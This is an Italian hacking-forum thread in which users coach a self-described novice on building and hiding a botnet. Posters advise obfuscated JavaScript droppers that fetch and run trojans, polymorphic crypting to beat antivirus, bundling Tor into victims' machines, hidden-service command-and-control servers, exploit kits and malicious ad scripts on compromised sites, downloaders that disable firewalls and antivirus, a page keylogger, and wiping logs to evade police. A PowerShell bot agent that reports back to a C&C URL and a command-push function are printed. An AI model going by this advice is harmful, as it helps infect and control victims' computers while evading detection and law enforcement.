no aspetta io ti dico di offuscare il javascript che scarica e esegue il trojan da internet oppure che lo "droppa", il codice dell'exe si offusca quando il file non è ancora compilato (e quindi l'obfuscation cambia in base al linguaggio che si usa) poichè a differenza di un javascript che basta aprire con il blocco note per trovare il codice sorgente l'exe è compilato e quindi è (relativamente) più difficile risalire al source code stesso. Riguardo al fattore crypter io ti consiglio di effettuare un malware con codice polimorfico cioè che, appena eseguito decripta la parte malevola e la esegue così da superare lo scantime.
- Stato
riguardo a questo anche se l'ha scritto Gorate ti rispondo io intende connettersi alla rete Tor quindi far passare tutte le richieste tramite deep web e per farlo in python c'è questa guida molto facile su youtube
Grazie, mi dici come si potrebbe risalire al sorgente di un file exe compilato?
Si ma in questo caso lo zombie deve necessariamente avere tor installato e attivo... E la maggior parte delle persone non usa tor
la prima cosa si chiama reverse engineering ed è abbastanza complicatuccia, per la seconda cosa basta che fai in modo che il javascript scarichi anche una cartella che crei tu dove inserisci tutti i file necessari al funzionamento di tor e nella stessa sottocartella di tor.exe inserisci il file torrc-defaults (che prima si trovava in \Tor Browser\Browser\TorBrowser\Data\Tor) poi fai si che il javascript esegua il comando tor.exe -f .\torrc.defaults nella cartella con tutti i file così da far partire il servizio tor infine tramite il file python fai tutto come se avessi tor facendo passare tutti i dati per la porta 9150 non 9050 tuttavia prendi questa parte molto con le pinze essendo questa solo frutto di una mia teoria
Allora, per risalire al source, semplicemente bisogna reversare il vettore di infezione [appunto e' comodo un exploit kit: non lascia evidenti traccie "materiali" su pc attaccato];
Comunque nel reversing, la prima cosa e' diasemblare il file, vedi IDA Pro; Se evntualmente criptato, cerchi tracce in moduli od altri file creati dal malware in modo da trovare come e' stato criptato/offuscato il codice. Poi reversi in codice assembly il file [vedi Olydbg], infine attraverso altri tool cerchi di trovare piu' info, come processi creati, thread innescati, altri moduli che servono per il run dell' applicazione od eventuali dipendenze; Alla fine analizzi il codice assembly risultante, e provi attraverso vari comandi e tool a trovare dove vengono mandate/ricevute le connessioni e di conseguenza trovi il sito/server da cui provengono; Un comando molto semplice per vedere le connessione in entrata ed uscita e' :
.
Per quanto riguarda la cosa di TOR, io pensavo piu' ad un vettore che faccia passare i comandi sotto proxy, e le relative risposte di out dei dispositivi infettati: in questo modo emuli Tor al meglio; Mentre se vuoi proprio Tor, devi trovare il modo : https://www.researchgate.net/publication/289853847_Tor-based_Malware_and_Tor_Connection_Detection e comunque provare con sfruttare il servizio Tor attraverso applicativi "prefabbricati" che di conseguenza ti permettno di far connettere la vittima a Tor dopo aver eseguito lo script, un po' come ha detto ScriptMan, ma cercando di fare il tutto con script powershell o python ............
;Sempre se escludi la cosa dei pannelli secondari in clear web e il principale in anonimato............
Comunque nel reversing, la prima cosa e' diasemblare il file, vedi IDA Pro; Se evntualmente criptato, cerchi tracce in moduli od altri file creati dal malware in modo da trovare come e' stato criptato/offuscato il codice. Poi reversi in codice assembly il file [vedi Olydbg], infine attraverso altri tool cerchi di trovare piu' info, come processi creati, thread innescati, altri moduli che servono per il run dell' applicazione od eventuali dipendenze; Alla fine analizzi il codice assembly risultante, e provi attraverso vari comandi e tool a trovare dove vengono mandate/ricevute le connessioni e di conseguenza trovi il sito/server da cui provengono; Un comando molto semplice per vedere le connessione in entrata ed uscita e' :
Codice:
netstat -aPer quanto riguarda la cosa di TOR, io pensavo piu' ad un vettore che faccia passare i comandi sotto proxy, e le relative risposte di out dei dispositivi infettati: in questo modo emuli Tor al meglio; Mentre se vuoi proprio Tor, devi trovare il modo : https://www.researchgate.net/publication/289853847_Tor-based_Malware_and_Tor_Connection_Detection e comunque provare con sfruttare il servizio Tor attraverso applicativi "prefabbricati" che di conseguenza ti permettno di far connettere la vittima a Tor dopo aver eseguito lo script, un po' come ha detto ScriptMan, ma cercando di fare il tutto con script powershell o python ............
;Sempre se escludi la cosa dei pannelli secondari in clear web e il principale in anonimato............
giusto e concordo sul fatto che l'exploit kit non lascia tracce materiali evidenti ma purtroppo se utilizzi solo quello come vettore di espansione appena si scopre anche banalmente (quando qualcuno inserisce il tuo file su un sito di analisi di malware) quale è l'indirizzo a cui si connette il malware subito interverranno sia gli AV che metteranno l'url sulla lista siti non sicuri e che segneranno e bloccheranno l'exploit kit che la polizia postale (sottolineo: sempre se parliamo di spreading di massa) che disattiverà il server di hosting ma se vuoi fare uno spreading piccolo (per capirsi non stile "Mirai") allora quello che dice Gorate è corretto
In effetti hai ragione, ma con piu' metodi di exploiting, e con vari siti tutti con diversi exploit kit, il fatto della massa comunque continua; L' unica cosa e' che come dici se capiscono come patchare un 0day, sono tuberi amari ;
Io visto tutto, consiglierei di adottare tecniche "incrociate" : incroci vari siti infetti, con varie vulnerabilita' con i metodi "tradizionali" : in questo modo certo, lasci piu' tracce "materiali", ma se offuschi per bene, poi magari non mandi tramite mail il payload, ma il downloader che preparara "il terreno in modo fertile" [cioe' disattiva firewall e AV, evita sancbox in browser ecc...........], e poi downloada e autorunna il tutto, potresti ottenere qualcosa, anche perche' obbiettivaente: nel mondo ci sono quasi 8 miliardi di persone: almeno 3/4 non sa' nemmeno come funge un pc, pensare un AV ecc......., almeno i 2/4 e' stupida...........e soprovveduta ............,quindi diciamo che come grandezza alla fine ci arrivi; Io sinceramente tirando le somme ti direi proprio di provare cosi' :
tecniche tradizionali + exploit kit e innovazione, ma tutto in modo da non lasciare agli AV il respiro ed evitare di lasciare tracce [che comunque lasci in tutti i modi: con i file se attraverso spread di mail/donloader/ecc........, sia con gli exploit kit, infatti gli script vengono catalogati dal browser sandbox integrato].
Per fare proprio qualcosa di buono, piu' di exploit kit [che come dice giustamente ScriptMan sono "inutili" perche' se patchati perdono di significato], inviterei a fare cose come js infetto negli ads dei siti: riesci ad infettare, e anche se ti scoprono, al massimo lo mettono in black list, ma non fermano il metodo di attacco o l' eventuale vuln adottata.
Esatto il js infetto è il metodo più immediato e buono ma anche l`estensione per google o firefox non è un metodo da sottovalutare
Si, ma nel caso di non lasicare tracce, i plugin valgono quasi come i payload dato che se installati nel browser vittima, non solo lasciano molti log e sono costante,emte controllati dal sandbox del browser, ma allo stesso tempo lasciano tracce delle azioni che compiono, cosa da non sottovautare, quindi meglio se uno manda un vettore completo, almeno lascia come traccia solo se stesso ed i servizi di cui usifruisce : esempio dll ecc.........io sincermanete consiglierei di provare a creare un flusso di dati contiuo ch non si interrompa nel caso il vettore venga eliminato: cosi' facendo sarbbe pericoloso perche' potresti essere raggiunto sempre dai client, ma almeno puoi eliminare il vettore principale che contiene info riguardanti il socket/server ed eventuali pezzi di codice che se scoperti potrebbero essere "letali" per la botnet stessa.
Naturalmente, se riesci a far cio', non puoi soltanto fare
Codice:
rm -rf malware.sh
od
del malware.exeComunque in linea di massima, facendo come detto riesci ad ottenere il tutto anche senza rovinarti la vita con flussi di dati aperti ed eliminazione di tracce, ma semplicemente criptando il payload ed eliminando le tracce piu' ovvie
Ragazzi, mettiamo caso che riesco a configurare correttamente tor nei bot e quindi riesco a farli connettere al server tramite tor. E' possibile riuscire a trovare l'ip del server se si reversa il codice exe compilato? E seconda cosa, ha senso secondo voi torrificare la connessione dei bot e non del server? Non saprei proprio come fare per torrificare la connessione del server e in tutto questo mantenere la connessione attiva coi vari bots...
Aspetta io ti consiglio allora proprio di prendere una vps nel deep web così che l`indirizzo stesso sia completamente nel deep web con la conseguenza di una grande possibilità di anonimato ottimo. Una volta preso il vps nel deep web (mi sembra ci sia un servizio chiamato tor vps ma non so se si tratti di scam oppure se ti serve solo un hosting per il pannello usa torpress che è free se ancora funziona) fai connettere il js malevolo tramite la rete Tor,come ti abbiamo detto al sito, e il gioco è fatto. Così facendo anche si riuscisse a trovare l`ip del sito/server difficilmente qualcuno potrà unregistrarlo o buttarlo giù
Perfetto farò così. Ma a questo punto sono curioso... Se il server non è nel deep web? Come si fa?
Ripeto quello che ho detto prima:
In quel caso anche se la connessione passa tramite proxy di rete Tor è possibile trovare il sito perché è vero che nascondi la destinazione dei pacchetti all`ISP perché passa attraverso tor ma essi hanno una destinazione quindi analizzando i pacchetti con wireshark oppure anche solo caricando il file su un sito di malware analysis la destinazione del pacchetto si vede
Volendo potresti anche comprarti una VPS non sotto TOR e configurartela a modo tuo:
https://www.torproject.org/docs/tor-hidden-service.html.en , almeno eviti troppi controlli dato che una gia' comprata con host deep web, e' molto spesso controllata; Cosa ancor migliore se la VPS te la fai tu con una macchina remota gestita 100% da te: in questo modo nessuno eccetto te sapra' che hai un host sul deep web e nessuno potra' bannarti dato che se hosti con servizi di hosting altrui, automaticamente sei controllato e se hosti una botnet come minimo ti bannano, come massimo chiamano la polizia postale...............
Comunque la cosa migliore sarebbe proprio provare come detto: rete decentralizzata, almeno anche se scoprono [cosa inevitabile: succedera' sempre], scoprono un sito [nel clear web cosi' non devi ammazzarti per farti una VPS con Tor] che pero' ha solo 20 bot .......il collegamento con il pannello principale nel deep web puoi ben nasconderlo: elimini i log di connessione ogni giorno ed elimini le tracce di rete che potrebbero essere esposte semplicemente digitando
. a cosa da fare inoltre, con gli exploit kit sarebbe quella di evitare di far capire il meccanisco, e di adottare piu' exploit per la stessa pagina cercando pero' di non lasciare tracce, in modo che un controllo forense riveli solo che si e' stati infettati.
Pr dirla tutta, la cosa che gli expoit kit adottan 0day patchabili, e' vero, ma nel tuo caso sarebbe semplice anche fare cose semplici ma buone: un applet malevolo non ci si mette molto a farlo; L' unico problema e' il black listing e per questo dico: usa molti host e siti vecchi vulnerabili: saranno messi in black list molto dopo rispetto a siti creati 2 giorni prima con una sola pagina che presenta un applet infetto o non so' cosa. Infatti un sito vecchio, e' ritenuto affidabile, e lo stesso utente [che dovrebbe segnalarlo non lo fa' ], in questo modo solo l' AV deve "accorgersi" che il sito e' malevolo, ma lo scann sara' minore rispetto ad uno come detto prima. Infine se si usano tecniche semplici come detto prima, la rilevazione e' molto piu' difficile, dato che ad esepio la funzione js per vedere quando il si clicca unpulsante la usiamo comunemente nei nostri siti, ma trasformandola per bene e senza dare nell' occhio, potrebbe diventare un semplicissimo keylogger su pagina corrente, che comunque e' interessante ...................lo stesso lo potresti fare per un exploit kit, le cue tecniche non potrebbero essere patchate
https://www.torproject.org/docs/tor-hidden-service.html.en , almeno eviti troppi controlli dato che una gia' comprata con host deep web, e' molto spesso controllata; Cosa ancor migliore se la VPS te la fai tu con una macchina remota gestita 100% da te: in questo modo nessuno eccetto te sapra' che hai un host sul deep web e nessuno potra' bannarti dato che se hosti con servizi di hosting altrui, automaticamente sei controllato e se hosti una botnet come minimo ti bannano, come massimo chiamano la polizia postale...............
Appunto, la cosa migliore sarebbe criptare la connessione e il malware: piu' difficile da reversare e non si possono vedere i dati che manda,; In questo modo potrebbe essere anche un' altra applicazione il malware.
Comunque la cosa migliore sarebbe proprio provare come detto: rete decentralizzata, almeno anche se scoprono [cosa inevitabile: succedera' sempre], scoprono un sito [nel clear web cosi' non devi ammazzarti per farti una VPS con Tor] che pero' ha solo 20 bot .......il collegamento con il pannello principale nel deep web puoi ben nasconderlo: elimini i log di connessione ogni giorno ed elimini le tracce di rete che potrebbero essere esposte semplicemente digitando
Codice:
netstat -aPr dirla tutta, la cosa che gli expoit kit adottan 0day patchabili, e' vero, ma nel tuo caso sarebbe semplice anche fare cose semplici ma buone: un applet malevolo non ci si mette molto a farlo; L' unico problema e' il black listing e per questo dico: usa molti host e siti vecchi vulnerabili: saranno messi in black list molto dopo rispetto a siti creati 2 giorni prima con una sola pagina che presenta un applet infetto o non so' cosa. Infatti un sito vecchio, e' ritenuto affidabile, e lo stesso utente [che dovrebbe segnalarlo non lo fa' ], in questo modo solo l' AV deve "accorgersi" che il sito e' malevolo, ma lo scann sara' minore rispetto ad uno come detto prima. Infine se si usano tecniche semplici come detto prima, la rilevazione e' molto piu' difficile, dato che ad esepio la funzione js per vedere quando il si clicca unpulsante la usiamo comunemente nei nostri siti, ma trasformandola per bene e senza dare nell' occhio, potrebbe diventare un semplicissimo keylogger su pagina corrente, che comunque e' interessante ...................lo stesso lo potresti fare per un exploit kit, le cue tecniche non potrebbero essere patchate
In tutto questo però c'è un problema fondamentale se configuri un server magari anche tuo (quuindi non un hosting online) per tor browser o metti le dovute precauzioni oppure c`è la possibilità che esso sia facilmente bucabile e accessibile da hacker o esperti di sicurezza esterni... a questo punto mi rivolgo a @Anianded mi è venuta una buona idea invece di tor o deep web perché non provi a dare un`occhiata a zeronet una "rete" completamente decentralizzata accessibile anche solo proxy e funzionante a peer così hosti tutto in modo decentralizzato e difficilmente rintracciabile il link all`articolo inforge dove se ne parla è qui https://www.inforge.net/xi/threads/...oin-crypto-and-the-bittorrent-network.464179/ e a breve farò una guida completa su come configurarlo
Comunque, riguardo le HTTP botnets, vediamo se ho capito bene. Una volta che il client è stato infettato, farà una richiesta GET al server botmaster nella quale saranno presenti dati e informazioni riguardanti la macchina infettata. Il botmaster quindi che ha visto che il bot è stato infettato con successo, può procedere a impartire comandi.. Per esempio, nel caso di un attacco denial of service, come fa il pannello php di controllo botmaster a "far sapere" al client cosa fare? Questa parte mi sfugge... E poi si dice che è meglio un http botnet che una irc.. Ma perchè? Probabilmente se si dice sarà vero ma un novizio come me che ha ancora tanto da imparare non riesce a cogliere il perchè.. Alla fine cosa cambia rispetto a una http botnet? I bot anzichè joinare in un pannello php, joinano in un server irc, e da li si impartiscono i comandi in quella che possiamo chiamare "shell comune" anche se non è una shell ma un semplice canale irc.. Giusto?
Semplicemente per il fatto che la porta 80 e' in whitelist di tutti i firewall, mentre le porte IRC potrebbero provocare incompatibilita' e problemi con il firewall. Sono meglio anche perche' il traffico HTTPS e' criptato con SSL, che garantisce quindi miglior difesa contro eventuali sniff di dati che passano per il collegamento [magari effettuata da un reverser].Il collegamento sfrutta un server intermedio specializzato che supporta il protocollo direttamente o lo usa come incapsulamento per altri protocolli che devono restare nascosti e di conseguenza e' maggiormente "manovrabile" ed utilizzabile.
Allora: qui la cosa si complica: innanzitutto appena il sistema e' infettato invia al cnc [anche C&C, command and control] panel, tutte le info importanti e rilevanti: OS,versione,piattaforma 32/64 bit ecc....... ; Nel caso di una IRC botnet, il bot si collega ad una chat privata irc protetta da password. Nel caso di botnet HTTP/HTTPS, i bot mandano cosi' :
Codice:
agente in powershell example:
function sendOutput {
param (
[string]$output = ""
)
$values = New-Object System.Collections.Specialized.NameValueCollection;
$values.Add("botid", $BOTID);
$values.Add("output", $output);
$wc = New-Object System.Net.WebClient
$wc.UploadValues($SRVURL + "/api/report","post", $values);
$WC.Dispose();
}
[preso da https://github.com/sweetsoftware/Ares, ti consiglio di studiartela ]
Codice:
function send_command(e) {
$.post("../api/push", {'botid': '{{botid}}', 'cmd': $('#cmd').val()});
$('#cmd').val('');
return false;
}- Stato
DISCUSSIONI SIMILI
- Chiuso
-
- 1
-
- 567
- Chiuso
-
- 0
-
- 200